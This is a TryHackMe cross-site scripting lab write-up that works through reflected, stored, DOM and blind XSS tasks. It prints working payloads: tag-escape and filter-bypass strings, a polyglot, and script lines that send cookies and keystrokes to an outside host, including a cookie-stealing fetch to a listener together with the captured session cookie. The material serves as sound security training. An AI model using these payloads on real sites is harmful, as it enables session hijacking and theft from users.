Cross-Site Scripting
February 27, 2024
Task 1: Room Brief
Task 2: XSS Payloads
<script>alert('XSS');</script>
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
<script>user.changeEmail('attacker@hacker.thm');</script>
Task 3: Reflected XSS
Task 4: Stored XSS
Task 5: Dom Based XSS
Task 6: Blind XSS
Task 7: Perfecting your payload
First Task
First once we visited the website it will show a input box that asking for our name. Then after we entered the name it will automatically display.
Now instead of entering our name, we are going to insert our payload to the input text box. This will give a alert sign to the user that will dictates that there is a vulnerability in the input text box which it is not validating the user's input.
After that every time we will refresh the page, the alert box will show but when we visited again the site like when you remove the url and enter the newly fresh page the xss payload will be gone.
<script>alert('THM');</script>
Second Task
For the second task, once again we will enter our name in the input text box to try the functions in the web page. The result actually return the "Hello" text and our name in the input tag.
We can see our name is inside the input value = kyou
Now we are going to try to insert our newly made payload to the level 2 input text box. As you can see there is a "> in the payload. This will close the bracket value in the input. See the image below.
"><script>alert('THM');</script>
Third Task
For the third task once again we have to test the text area tag, we will input our name and see the result.
As we can see here the textarea tag contains our name which is kyou
Now we know how the parameter is being process in the source page. We will now modify our xss payload. Adding a </textarea> in the beginning of the payload will close the textarea tag.
Therefore, the alert function will execute.
</textarea><script>alert('THM');</script>
As you can see here the payload works and the textarea closes and executes our payload.
Fourth Task
For the fourth task, once again we will try the input box with our name. It stays the same with the previous levels.
It actually returns as a JavaScript code.
" You'll have to escape the existing JavaScript command, so you're able to run your code; you can do this with the following payload ';alert('THM');// which you'll see from the below screenshot will execute your code.
';alert('THM');//The ' closes the field specifying the name, then ; signifies the end of the current command, and the // at the end makes anything after it a comment rather than executable code. " - Tryhackme
Fifth Task
As usual we will try our name first in the input text box
It says here that it returns as a normal text
But when we try the normal xss payload we will get this result. It actually remove the script tag in the payload and only returns the alert which will cause an error that will not execute our alert function.
Therefore, there is a filter that is set in the code that will remove the script name or potential dangerous words/tag/names.
<script>alert('THM');</script>
There is actually a trick that will bypass the filter we will just modify our xss payload to have extra letters that once the word "script" will be remove the final result will still be "script" tag. Like the picture below.
<sscriptcript>alert('THM');</sscriptcript>
As we can see in the source page the script is actually executed in the web page and the script stays that is supposed to.
Sixth Task
The sixth task is different from the rest of the task that we actually took so far. It actually asking for image path so we just have to give the default path for the cat.jpg. The path that we gave is /images/cat.jpg
Then it displays the cat picture which is a orange cat
When we try to view the source page it just returns like a normal img src that have value /images/cat.jpg
When we try to do a xss payload like the task 2 / second task. It just return a result like this in the source page and we did not get our expected alert function in the web page.
The < and > characters are being filtered out from our payload, preventing us from escaping the IMG tag.
"><script>alert('THM');</script>
" To get around the filter, we can take advantage of the additional attributes of the IMG tag, such as the onload event. The onload event executes the code of your choosing once the image specified in the src attribute has loaded onto the web page.
Let's change our payload to reflect this /images/cat.jpg" onload="alert('THM'); and then viewing the page source, and you'll see how this will work. " - Tryhackme
Seventh Task
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
Task 8: Practical Example (Blind XSS)
For the last task that we needed to do is that first we have to create a account for us to view the "Support Ticket".
username: kyou
email: kyou@kyou.com
pass: qwerty123
After we sign in to the website using the credentials that we made. We will now create a ticket to the website
ticket subj: test
ticket contents: test
Here we can see the ticket that we made.
As we can see here that our "Ticket Contents" is in a textarea tag.
Therefore, we should try to create another ticket this time we will be inserting the </textarea>test
This will test if the textarea tag will close
</textarea>test2
As we view the ticket id 4, we can see here that the test2 word is outside the textarea. Therefore, we succeeded closing the textarea tag.
We can confirm this by looking at the page source of that site
dasdas
</textarea><script>fetch('http://10.9.193.229:4444?cookie=' + btoa(document.cookie) );</script>
cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ==
Last updated